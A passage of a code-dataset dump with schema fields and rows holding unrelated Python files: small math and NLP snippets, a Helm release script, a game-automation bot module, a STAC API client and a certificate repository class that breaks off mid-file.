max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
python/calc_sum.py
lukasjoc/scritps
0
6627851
<reponame>lukasjoc/scritps<gh_stars>0 def factorize(lol, facts): for k, v in facts.items(): if v > 1: lol.append(k**v) else: lol.append(k) prod = 1 for factor in lol: prod = prod * factor return prod if __name__ == "__main__": facts = {7: 1, 5113051: 1} lol = [] print(factorize(lol, facts))
def factorize(lol, facts): for k, v in facts.items(): if v > 1: lol.append(k**v) else: lol.append(k) prod = 1 for factor in lol: prod = prod * factor return prod if __name__ == "__main__": facts = {7: 1, 5113051: 1} lol = [] print(factorize(lol, facts))
none
1
3.491346
3
nlp_models.py
Spotify-Song-3/data-science
0
6627852
import nltk from nltk.sentiment.vader import SentimentIntensityAnalyzer nltk.download('vader_lexicon') nltk.download('punkt') sid = SentimentIntensityAnalyzer() import spacy from spacy.tokenizer import Tokenizer nlp = spacy.load("en_core_web_lg") tokenizer = Tokenizer(nlp.vocab) STOP_WORDS = nlp.Defaults.stop_words import pandas as pd from nltk.stem import PorterStemmer ps = PorterStemmer() def processed_score(data=lyrics): tokens = [] df = pd.DataFrame(data.split(), columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def stemmed_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Stemming for word in data.split(): words.append(ps.stem(word)) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def get_lemmas(data): """ Gets lemmas for text """ lemmas = [] doc = nlp(data) for token in doc: if ((token.is_stop == False) and (token.is_punct == False)) and (token.pos_!= 'PRON'): lemmas.append(token.lemma_) return lemmas def lemma_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Lemmatization words = get_lemmas(data) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores
import nltk from nltk.sentiment.vader import SentimentIntensityAnalyzer nltk.download('vader_lexicon') nltk.download('punkt') sid = SentimentIntensityAnalyzer() import spacy from spacy.tokenizer import Tokenizer nlp = spacy.load("en_core_web_lg") tokenizer = Tokenizer(nlp.vocab) STOP_WORDS = nlp.Defaults.stop_words import pandas as pd from nltk.stem import PorterStemmer ps = PorterStemmer() def processed_score(data=lyrics): tokens = [] df = pd.DataFrame(data.split(), columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def stemmed_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Stemming for word in data.split(): words.append(ps.stem(word)) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores def get_lemmas(data): """ Gets lemmas for text """ lemmas = [] doc = nlp(data) for token in doc: if ((token.is_stop == False) and (token.is_punct == False)) and (token.pos_!= 'PRON'): lemmas.append(token.lemma_) return lemmas def lemma_score(data=lyrics): """ Processes the text via spacy """ tokens = [] words = [] # Lemmatization words = get_lemmas(data) df = pd.DataFrame(words, columns=['words']) for doc in tokenizer.pipe(df['words']): doc_tokens = [] for token in doc: if (token.is_stop == False) & (token.is_punct == False): doc_tokens.append(token.text.lower()) tokens.append(doc_tokens) df['tokens'] = tokens word_list = sum(list([item for item in df['tokens'] if len(item) != 0]), []) lyrics_processed = ' '.join(word_list) scores = sid.polarity_scores(lyrics_processed) return scores
en
0.525063
Processes the text via spacy # Stemming Gets lemmas for text Processes the text via spacy # Lemmatization
2.97175
3
5_Functions/B_parameters.py
Oscar-Oliveira/Python3
0
6627853
""" Parameters """ def write_names(value1, value2): print("{} : {}".format(value1, value2)) def print_max(value1, value2): if value1 >= value2: print(value1) else: print(value2) def say(value, qty): print(value * qty) write_names("Student1", "123") write_names("Student2", "456") write_names("Student3", "789") print() value1 = 10 value2 = 12 print("Max ({}, {}): ".format(value1, value2)) print_max(value1, value2) print() say("Python", value1)
""" Parameters """ def write_names(value1, value2): print("{} : {}".format(value1, value2)) def print_max(value1, value2): if value1 >= value2: print(value1) else: print(value2) def say(value, qty): print(value * qty) write_names("Student1", "123") write_names("Student2", "456") write_names("Student3", "789") print() value1 = 10 value2 = 12 print("Max ({}, {}): ".format(value1, value2)) print_max(value1, value2) print() say("Python", value1)
ta
0.050049
Parameters
3.889729
4
scripts/update-helm.py
mkorthof/wg-access-server
0
6627854
<gh_stars>0 #!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. import os import subprocess import yaml version = os.environ.get('GITHUB_REF_NAME') ref_type = os.environ.get('GITHUB_REF_TYPE') if not version or ref_type != 'tag': print('::error::Aborting, workflow not triggered by tag event') exit(1) # update the helm chart and quickstart manifest with open('deploy/helm/wg-access-server/Chart.yaml', 'r+') as f: chart = yaml.safe_load(f) chart['version'] = version chart['appVersion'] = version f.seek(0) yaml.dump(chart, f, default_flow_style=False) f.truncate() with open('deploy/k8s/quickstart.yaml', 'w') as f: subprocess.run(['helm', 'template', '--name-template', 'quickstart', 'deploy/helm/wg-access-server/'], stdout=f) subprocess.run(['helm', 'package', 'deploy/helm/wg-access-server/', '--destination', 'docs/charts/']) subprocess.run(['helm', 'repo', 'index', 'docs/', '--url', 'https://freie-netze.org/wg-access-server']) # commit changes subprocess.run(['git', 'add', 'docs/index.yaml', 'docs/charts/', 'deploy/helm/', 'deploy/k8s/']) subprocess.run(['git', 'commit', '-m', f'{version} - Automated Helm & k8s update']) # push everything subprocess.run(['git', 'push'])
#!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. import os import subprocess import yaml version = os.environ.get('GITHUB_REF_NAME') ref_type = os.environ.get('GITHUB_REF_TYPE') if not version or ref_type != 'tag': print('::error::Aborting, workflow not triggered by tag event') exit(1) # update the helm chart and quickstart manifest with open('deploy/helm/wg-access-server/Chart.yaml', 'r+') as f: chart = yaml.safe_load(f) chart['version'] = version chart['appVersion'] = version f.seek(0) yaml.dump(chart, f, default_flow_style=False) f.truncate() with open('deploy/k8s/quickstart.yaml', 'w') as f: subprocess.run(['helm', 'template', '--name-template', 'quickstart', 'deploy/helm/wg-access-server/'], stdout=f) subprocess.run(['helm', 'package', 'deploy/helm/wg-access-server/', '--destination', 'docs/charts/']) subprocess.run(['helm', 'repo', 'index', 'docs/', '--url', 'https://freie-netze.org/wg-access-server']) # commit changes subprocess.run(['git', 'add', 'docs/index.yaml', 'docs/charts/', 'deploy/helm/', 'deploy/k8s/']) subprocess.run(['git', 'commit', '-m', f'{version} - Automated Helm & k8s update']) # push everything subprocess.run(['git', 'push'])
en
0.788305
#!/usr/bin/env python3 # This script is intended to be run within GitHub Actions, triggered after new tags have been created. # It updates the version in the Helm Chart, packages it, renders the k8s quickstart.yaml, then commits and pushes everything. # A separate workflow triggered on pushes should then publish the charts to the GitHub Pages website. # update the helm chart and quickstart manifest # commit changes # push everything
2.221245
2
classes/manpage.py
ravermeister/xmpp-chatbot
1
6627855
# coding=utf-8 from common.strings import StaticAnswers # Linux Manpages Request class ManPageRequest: """ > query the Linux Manpages for the given argument """ def __init__(self, static_answers: StaticAnswers): # init all necessary variables self.static_answers = static_answers self.target, self.opt_arg = None, None # noinspection PyUnusedLocal def format(self, queries, target, opt_arg): self.target = target self.opt_arg = opt_arg man_url = "https://man.cx/" reply = man_url + self.target return reply
# coding=utf-8 from common.strings import StaticAnswers # Linux Manpages Request class ManPageRequest: """ > query the Linux Manpages for the given argument """ def __init__(self, static_answers: StaticAnswers): # init all necessary variables self.static_answers = static_answers self.target, self.opt_arg = None, None # noinspection PyUnusedLocal def format(self, queries, target, opt_arg): self.target = target self.opt_arg = opt_arg man_url = "https://man.cx/" reply = man_url + self.target return reply
en
0.315484
# coding=utf-8 # Linux Manpages Request > query the Linux Manpages for the given argument # init all necessary variables # noinspection PyUnusedLocal
3.061816
3
src/transmute/transmute.py
JohnStyleZ/botty
1
6627856
from asyncore import loop import itertools from random import randint, random import threading from config import Config from .inventory_collection import InventoryCollection from .stash import Stash from .gem_picking import SimpleGemPicking from item.item_finder import ItemFinder from screen import Screen from ui.ui_manager import UiManager from utils.custom_mouse import mouse from utils.misc import wait from version import __version__ from logger import Logger from game_stats import GameStats from template_finder import TemplateFinder import numpy as np import keyboard import os import cv2 FLAWLESS_GEMS = [ "INVENTORY_TOPAZ_FLAWLESS", "INVENTORY_AMETHYST_FLAWLESS", "INVENTORY_SAPPHIRE_FLAWLESS", "INVENTORY_DIAMOND_FLAWLESS", "INVENTORY_RUBY_FLAWLESS", "INVENTORY_EMERALD_FLAWLESS", "INVENTORY_SKULL_FLAWLESS" ] PERFECT_GEMS = [ "INVENTORY_TOPAZ_PERFECT", "INVENTORY_AMETHYST_PERFECT", "INVENTORY_SAPPHIRE_PERFECT", "INVENTORY_DIAMOND_PERFECT", "INVENTORY_RUBY_PERFECT", "INVENTORY_EMERALD_PERFECT", "INVENTORY_SKULL_PERFECT" ] class Transmute: @staticmethod def _wait(): wait(0.2, 0.3) def __init__(self, screen: Screen, template_finder: TemplateFinder, game_stats: GameStats, ui_manager: UiManager) -> None: self._screen = screen self._game_stats = game_stats self._template_finder = template_finder self._ui_manager = ui_manager self._last_game = 0 def pick_from_area(self, column, row, roi): slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] offset_y = (row+0.5)*slot_h offset_x = (column+0.5)*slot_w x, y, _, _ = roi x, y = self._screen.convert_screen_to_monitor( (x + offset_x, y + offset_y)) mouse.move(x, y) self._wait() keyboard.send('ctrl', do_release=False) self._wait() mouse.click("left") self._wait() keyboard.release('ctrl') self._wait() def open_cube(self): self._ui_manager._move_to_stash_tab(0) screen = self._screen.grab() match = self._template_finder.search( ["HORADRIC_CUBE"], screen, threshold=0.9, roi=Config.ui_roi["left_inventory"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("right") self._wait() else: Logger.error(f"Can't find cube: {match.score}") def transmute(self): screen = self._screen.grab() match = self._template_finder.search( ["CUBE_TRANSMUTE_BTN"], screen, roi=Config.ui_roi["cube_btn_roi"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("left") self._wait() def close_cube(self): self._wait() keyboard.send("esc") def stash_all_items(self): self._ui_manager.stash_all_items( Config.char["num_loot_columns"], ItemFinder()) def pick_from_cube_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["cube_area_roi"]) def pick_from_inventory_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["right_inventory"]) def pick_from_stash_at(self, index, column, row): self._ui_manager._move_to_stash_tab(index) return self.pick_from_area(column, row, Config.ui_roi["left_inventory"]) def inspect_area(self, total_rows, total_columns, roi, known_items) -> InventoryCollection: result = InventoryCollection() x, y, w, h = roi img = self._screen.grab()[y:y+h, x:x+w] slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] for column, row in itertools.product(range(total_columns), range(total_rows)): y_start, y_end = row*slot_h, slot_h*(row+1) x_start, x_end = column*slot_w, slot_w*(column+1) slot_img = img[y_start:y_end, x_start:x_end] if not self._is_slot_empty(slot_img[+4:-4, +4:-4], treshold=36): result.set_empty((column, row)) match = self._template_finder.search( known_items, slot_img, threshold=0.91, best_match=True) if match.valid: result.append(match.name, (column, row)) return result def _is_slot_empty(self, img, treshold=16.0): slot_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) avg_brightness = np.average(slot_img[:, :, 2]) return avg_brightness > treshold def inspect_inventory_area(self, known_items) -> InventoryCollection: return self.inspect_area(4, Config.char["num_loot_columns"], Config.ui_roi["right_inventory"], known_items) def inspect_stash(self) -> Stash: stash = Stash() for i in range(4): self._ui_manager._move_to_stash_tab(i) wait(0.4, 0.5) tab = self.inspect_area( 10, 10, Config.ui_roi["left_inventory"], FLAWLESS_GEMS) stash.add_tab(i, tab) return stash def put_back_to_stash_randomly(self) -> None: flawless_gems = self.inspect_inventory_area(FLAWLESS_GEMS) pick = [] for gem in flawless_gems.all_items(): while flawless_gems.count_by(gem) > 0: pick.append((randint(0, 3), *flawless_gems.pop(gem))) for tab, x, y in sorted(pick, key=lambda x: x[0]): self._ui_manager._move_to_stash_tab(tab) self.pick_from_inventory_at(x, y) def select_tab_with_enough_space(self, s: Stash) -> None: tabs_priority = Config._transmute_config["stash_destination"] for tab in tabs_priority: if s.get_empty_on_tab(tab) > 0: self._ui_manager._move_to_stash_tab(tab) break def put_back_all_gems(self, s: Stash) -> None: Logger.info( f'Putting back gems in the following stash tabs (by priority): {Config._transmute_config["stash_destination"]}') perfect_gems = self.inspect_inventory_area( PERFECT_GEMS + FLAWLESS_GEMS) for gem in perfect_gems.all_items(): while perfect_gems.count_by(gem) > 0: self.select_tab_with_enough_space(s) self.pick_from_inventory_at(*perfect_gems.pop(gem)) def should_transmute(self) -> bool: every_x_game = Config._transmute_config["transmute_every_x_game"] if every_x_game is None or every_x_game == "" or int(every_x_game) <= 0: return False return self._game_stats._game_counter - self._last_game >= int(every_x_game) def run_transmutes(self, force=False) -> None: gold_btn = self._template_finder.search_and_wait("INVENTORY_GOLD_BTN", roi=Config.ui_roi["gold_btn"], time_out=20) if not gold_btn.valid: Logger.error("Could not determine to be in stash menu. Continue...") return if not force and not self.should_transmute(): Logger.info(f"Skipping transmutes. Force: {force}, Game#: {self._game_stats._game_counter}") return None self._run_gem_transmutes() def check_cube_empty(self) -> bool: self.open_cube() area = self.inspect_cube() self.close_cube() return area.count_empty() == 12 def inspect_cube(self)-> InventoryCollection: return self.inspect_area(4, 3, roi=Config.ui_roi["cube_area_roi"], known_items=FLAWLESS_GEMS) def _run_gem_transmutes(self) -> None: Logger.info("Starting gem transmute") self._last_game = self._game_stats._game_counter s = self.inspect_stash() algorithm = SimpleGemPicking(s) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) is_cube_empty = None while True: while inventory.count_empty() >= 3: next_batch = algorithm.next_batch() is_cube_empty = self.check_cube_empty() if is_cube_empty is None else is_cube_empty if not is_cube_empty: Logger.warning("Some items detected in the cube. Skipping transmute") break if next_batch is None: Logger.info("No more gems to cube") break for tab, gem, x, y in next_batch: self.pick_from_stash_at(tab, x, y) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) if inventory.count() >= 3: self.open_cube() for gem in inventory.all_items(): while inventory.count_by(gem) > 0: for _ in range(3): next = inventory.pop(gem) self.pick_from_inventory_at(*next) self.transmute() self.pick_from_cube_at(2, 3) self.close_cube() self.put_back_all_gems(s) else: self.put_back_all_gems(s) break Logger.info("Finished gem transmute")
from asyncore import loop import itertools from random import randint, random import threading from config import Config from .inventory_collection import InventoryCollection from .stash import Stash from .gem_picking import SimpleGemPicking from item.item_finder import ItemFinder from screen import Screen from ui.ui_manager import UiManager from utils.custom_mouse import mouse from utils.misc import wait from version import __version__ from logger import Logger from game_stats import GameStats from template_finder import TemplateFinder import numpy as np import keyboard import os import cv2 FLAWLESS_GEMS = [ "INVENTORY_TOPAZ_FLAWLESS", "INVENTORY_AMETHYST_FLAWLESS", "INVENTORY_SAPPHIRE_FLAWLESS", "INVENTORY_DIAMOND_FLAWLESS", "INVENTORY_RUBY_FLAWLESS", "INVENTORY_EMERALD_FLAWLESS", "INVENTORY_SKULL_FLAWLESS" ] PERFECT_GEMS = [ "INVENTORY_TOPAZ_PERFECT", "INVENTORY_AMETHYST_PERFECT", "INVENTORY_SAPPHIRE_PERFECT", "INVENTORY_DIAMOND_PERFECT", "INVENTORY_RUBY_PERFECT", "INVENTORY_EMERALD_PERFECT", "INVENTORY_SKULL_PERFECT" ] class Transmute: @staticmethod def _wait(): wait(0.2, 0.3) def __init__(self, screen: Screen, template_finder: TemplateFinder, game_stats: GameStats, ui_manager: UiManager) -> None: self._screen = screen self._game_stats = game_stats self._template_finder = template_finder self._ui_manager = ui_manager self._last_game = 0 def pick_from_area(self, column, row, roi): slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] offset_y = (row+0.5)*slot_h offset_x = (column+0.5)*slot_w x, y, _, _ = roi x, y = self._screen.convert_screen_to_monitor( (x + offset_x, y + offset_y)) mouse.move(x, y) self._wait() keyboard.send('ctrl', do_release=False) self._wait() mouse.click("left") self._wait() keyboard.release('ctrl') self._wait() def open_cube(self): self._ui_manager._move_to_stash_tab(0) screen = self._screen.grab() match = self._template_finder.search( ["HORADRIC_CUBE"], screen, threshold=0.9, roi=Config.ui_roi["left_inventory"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("right") self._wait() else: Logger.error(f"Can't find cube: {match.score}") def transmute(self): screen = self._screen.grab() match = self._template_finder.search( ["CUBE_TRANSMUTE_BTN"], screen, roi=Config.ui_roi["cube_btn_roi"]) if match.valid: x, y = self._screen.convert_screen_to_monitor(match.center) mouse.move(x, y) self._wait() mouse.click("left") self._wait() def close_cube(self): self._wait() keyboard.send("esc") def stash_all_items(self): self._ui_manager.stash_all_items( Config.char["num_loot_columns"], ItemFinder()) def pick_from_cube_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["cube_area_roi"]) def pick_from_inventory_at(self, column, row): return self.pick_from_area(column, row, Config.ui_roi["right_inventory"]) def pick_from_stash_at(self, index, column, row): self._ui_manager._move_to_stash_tab(index) return self.pick_from_area(column, row, Config.ui_roi["left_inventory"]) def inspect_area(self, total_rows, total_columns, roi, known_items) -> InventoryCollection: result = InventoryCollection() x, y, w, h = roi img = self._screen.grab()[y:y+h, x:x+w] slot_w = Config.ui_pos["slot_width"] slot_h = Config.ui_pos["slot_height"] for column, row in itertools.product(range(total_columns), range(total_rows)): y_start, y_end = row*slot_h, slot_h*(row+1) x_start, x_end = column*slot_w, slot_w*(column+1) slot_img = img[y_start:y_end, x_start:x_end] if not self._is_slot_empty(slot_img[+4:-4, +4:-4], treshold=36): result.set_empty((column, row)) match = self._template_finder.search( known_items, slot_img, threshold=0.91, best_match=True) if match.valid: result.append(match.name, (column, row)) return result def _is_slot_empty(self, img, treshold=16.0): slot_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) avg_brightness = np.average(slot_img[:, :, 2]) return avg_brightness > treshold def inspect_inventory_area(self, known_items) -> InventoryCollection: return self.inspect_area(4, Config.char["num_loot_columns"], Config.ui_roi["right_inventory"], known_items) def inspect_stash(self) -> Stash: stash = Stash() for i in range(4): self._ui_manager._move_to_stash_tab(i) wait(0.4, 0.5) tab = self.inspect_area( 10, 10, Config.ui_roi["left_inventory"], FLAWLESS_GEMS) stash.add_tab(i, tab) return stash def put_back_to_stash_randomly(self) -> None: flawless_gems = self.inspect_inventory_area(FLAWLESS_GEMS) pick = [] for gem in flawless_gems.all_items(): while flawless_gems.count_by(gem) > 0: pick.append((randint(0, 3), *flawless_gems.pop(gem))) for tab, x, y in sorted(pick, key=lambda x: x[0]): self._ui_manager._move_to_stash_tab(tab) self.pick_from_inventory_at(x, y) def select_tab_with_enough_space(self, s: Stash) -> None: tabs_priority = Config._transmute_config["stash_destination"] for tab in tabs_priority: if s.get_empty_on_tab(tab) > 0: self._ui_manager._move_to_stash_tab(tab) break def put_back_all_gems(self, s: Stash) -> None: Logger.info( f'Putting back gems in the following stash tabs (by priority): {Config._transmute_config["stash_destination"]}') perfect_gems = self.inspect_inventory_area( PERFECT_GEMS + FLAWLESS_GEMS) for gem in perfect_gems.all_items(): while perfect_gems.count_by(gem) > 0: self.select_tab_with_enough_space(s) self.pick_from_inventory_at(*perfect_gems.pop(gem)) def should_transmute(self) -> bool: every_x_game = Config._transmute_config["transmute_every_x_game"] if every_x_game is None or every_x_game == "" or int(every_x_game) <= 0: return False return self._game_stats._game_counter - self._last_game >= int(every_x_game) def run_transmutes(self, force=False) -> None: gold_btn = self._template_finder.search_and_wait("INVENTORY_GOLD_BTN", roi=Config.ui_roi["gold_btn"], time_out=20) if not gold_btn.valid: Logger.error("Could not determine to be in stash menu. Continue...") return if not force and not self.should_transmute(): Logger.info(f"Skipping transmutes. Force: {force}, Game#: {self._game_stats._game_counter}") return None self._run_gem_transmutes() def check_cube_empty(self) -> bool: self.open_cube() area = self.inspect_cube() self.close_cube() return area.count_empty() == 12 def inspect_cube(self)-> InventoryCollection: return self.inspect_area(4, 3, roi=Config.ui_roi["cube_area_roi"], known_items=FLAWLESS_GEMS) def _run_gem_transmutes(self) -> None: Logger.info("Starting gem transmute") self._last_game = self._game_stats._game_counter s = self.inspect_stash() algorithm = SimpleGemPicking(s) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) is_cube_empty = None while True: while inventory.count_empty() >= 3: next_batch = algorithm.next_batch() is_cube_empty = self.check_cube_empty() if is_cube_empty is None else is_cube_empty if not is_cube_empty: Logger.warning("Some items detected in the cube. Skipping transmute") break if next_batch is None: Logger.info("No more gems to cube") break for tab, gem, x, y in next_batch: self.pick_from_stash_at(tab, x, y) inventory = self.inspect_inventory_area(FLAWLESS_GEMS) if inventory.count() >= 3: self.open_cube() for gem in inventory.all_items(): while inventory.count_by(gem) > 0: for _ in range(3): next = inventory.pop(gem) self.pick_from_inventory_at(*next) self.transmute() self.pick_from_cube_at(2, 3) self.close_cube() self.put_back_all_gems(s) else: self.put_back_all_gems(s) break Logger.info("Finished gem transmute")
en
0.630254
#: {self._game_stats._game_counter}")
2.013327
2
models/api.py
suricactus/qgis-stac-browser
0
6627857
<reponame>suricactus/qgis-stac-browser<filename>models/api.py import re from urllib.parse import urlparse from .collection import Collection from .link import Link from .search_result import SearchResult from ..utils import network class API: def __init__(self, json=None): self._json = json self._data = self._json.get('data', None) self._collections = [ Collection(self, c) for c in self._json.get('collections', []) ] def load(self): self._data = network.request(f'{self.href}/stac') self._collections = [ self.load_collection(c) for c in self.collection_ids ] def load_collection(self, collection_id): return Collection(self, network.request( f'{self.href}/collections/{collection_id}')) def search_items(self, collections=[], bbox=[], start_time=None, end_time=None, page=1, next_page=None, limit=50, on_next_page=None, page_limit=10): if page > page_limit: return [] if on_next_page is not None: on_next_page(self) if end_time is None: time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') else: start = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') end = end_time.strftime('%Y-%m-%dT%H:%M:%SZ') time = f'{start}/{end}' body = { 'collections': [c.id for c in collections], 'bbox': bbox, 'time': time, 'limit': limit } if next_page is not None: body['next'] = next_page else: body['page'] = page search_result = SearchResult(self, network.request( f'{self.href}/stac/search', data=body)) items = search_result.items if len(items) >= limit: items.extend(self.search_items(collections, bbox, start_time, end_time, page + 1, search_result.next, limit, on_next_page=on_next_page)) return items def collection_id_from_href(self, href): p = re.compile(r'\/collections\/(.*)') m = p.match(urlparse(href).path) if m is None: return None if m.groups() is None: return None return m.groups()[0] @property def json(self): return { 'id': self.id, 'href': self.href, 'data': self.data, 'collections': [c.json for c in self.collections], } @property def id(self): return self._json.get('id', None) @property def title(self): return self.data.get('title', self.href) @property def href(self): return self._json.get('href', None) @property def version(self): return self.data.get('stac_version', None) @property def description(self): return self.data.get('description', None) @property def data(self): if self._data is None: return {} return self._data @property def links(self): return [Link(l) for l in self.data.get('links', [])] @property def collection_ids(self): collection_ids = [] p = re.compile(r'\/collections\/(.*)') for link in self.links: m = p.match(urlparse(link.href).path) if m is None: continue if m.groups() is None: continue collection_ids.append(m.groups()[0]) return collection_ids @property def collections(self): return self._collections def __lt__(self, other): return self.title.lower() < other.title.lower()
import re from urllib.parse import urlparse from .collection import Collection from .link import Link from .search_result import SearchResult from ..utils import network class API: def __init__(self, json=None): self._json = json self._data = self._json.get('data', None) self._collections = [ Collection(self, c) for c in self._json.get('collections', []) ] def load(self): self._data = network.request(f'{self.href}/stac') self._collections = [ self.load_collection(c) for c in self.collection_ids ] def load_collection(self, collection_id): return Collection(self, network.request( f'{self.href}/collections/{collection_id}')) def search_items(self, collections=[], bbox=[], start_time=None, end_time=None, page=1, next_page=None, limit=50, on_next_page=None, page_limit=10): if page > page_limit: return [] if on_next_page is not None: on_next_page(self) if end_time is None: time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') else: start = start_time.strftime('%Y-%m-%dT%H:%M:%SZ') end = end_time.strftime('%Y-%m-%dT%H:%M:%SZ') time = f'{start}/{end}' body = { 'collections': [c.id for c in collections], 'bbox': bbox, 'time': time, 'limit': limit } if next_page is not None: body['next'] = next_page else: body['page'] = page search_result = SearchResult(self, network.request( f'{self.href}/stac/search', data=body)) items = search_result.items if len(items) >= limit: items.extend(self.search_items(collections, bbox, start_time, end_time, page + 1, search_result.next, limit, on_next_page=on_next_page)) return items def collection_id_from_href(self, href): p = re.compile(r'\/collections\/(.*)') m = p.match(urlparse(href).path) if m is None: return None if m.groups() is None: return None return m.groups()[0] @property def json(self): return { 'id': self.id, 'href': self.href, 'data': self.data, 'collections': [c.json for c in self.collections], } @property def id(self): return self._json.get('id', None) @property def title(self): return self.data.get('title', self.href) @property def href(self): return self._json.get('href', None) @property def version(self): return self.data.get('stac_version', None) @property def description(self): return self.data.get('description', None) @property def data(self): if self._data is None: return {} return self._data @property def links(self): return [Link(l) for l in self.data.get('links', [])] @property def collection_ids(self): collection_ids = [] p = re.compile(r'\/collections\/(.*)') for link in self.links: m = p.match(urlparse(link.href).path) if m is None: continue if m.groups() is None: continue collection_ids.append(m.groups()[0]) return collection_ids @property def collections(self): return self._collections def __lt__(self, other): return self.title.lower() < other.title.lower()
none
1
2.5854
3
trust_stores_observatory/certificates_repository.py
stefanb/trust_stores_observatory
0
6627858
from binascii import hexlify from pathlib import Path import os from typing import Union, List from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.hashes import SHA256 from cryptography.hazmat.primitives.serialization import Encoding from cryptography.x509 import Certificate, load_pem_x509_certificate class CertificateNotFoundError(KeyError): pass class RootCertificatesRepository: """A local folder where we store as many root certificates (as PEM files) as possible. """ def __init__(self, local_root_path: Path) -> None: self._path = local_root_path all_certificates = [] for pem_file_path in self._path.glob('*.pem'): with open(pem_file_path) as pem_file: cert_pem = pem_file.read() cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) all_certificates.append(cert) self._all_certificates = all_certificates # Parse each certificate so we can look them up with SHA1 self._sha1_map = {cert.fingerprint(hashes.SHA1()): cert for cert in self._all_certificates} @classmethod def get_default(cls) -> 'RootCertificatesRepository': root_path = Path(os.path.abspath(os.path.dirname(__file__))) / '..' / 'certificates' return cls(root_path) def get_all_certificates(self) -> List[Certificate]: return self._all_certificates def lookup_certificate_with_fingerprint( self, fingerprint: bytes, hash_algorithm: Union[hashes.SHA1, hashes.SHA256] = hashes.SHA256(), ) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') if isinstance(hash_algorithm, hashes.SHA1): try: return self._sha1_map[fingerprint] except KeyError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') elif isinstance(hash_algorithm, hashes.SHA256): try: return self._lookup_certificate_with_sha256_fingerprint(fingerprint) except FileNotFoundError: raise CertificateNotFoundError(f'Could not find certificate {hex_fingerprint}') else: raise ValueError('Hash algorithm not supported') def _lookup_certificate_with_sha256_fingerprint(self, fingerprint: bytes) -> Certificate: hex_fingerprint = hexlify(fingerprint).decode('ascii') pem_path = self._path / f'{hex_fingerprint}.pem' with open(pem_path, mode='r') as pem_file: cert_pem = pem_file.read() # Parse the certificate to double check the fingerprint parsed_cert = load_pem_x509_certificate(cert_pem.encode(encoding='ascii'), default_backend()) if fingerprint != parsed_cert.fingerprint(SHA256()): cert_fingerprint = hexlify(parsed_cert.fingerprint(SHA256()).decode('ascii')) hex_fingerprint = hexlify(fingerprint).decode('ascii') raise ValueError(f'Fingerprint mismatch for certificate :{hex_fingerprint} VS {cert_fingerprint}') return parsed_cert def store_certificate(self, certificate: Certificate) -> Path: """Store the supplied certificate as a PEM file. """ # A given certificate's path is always 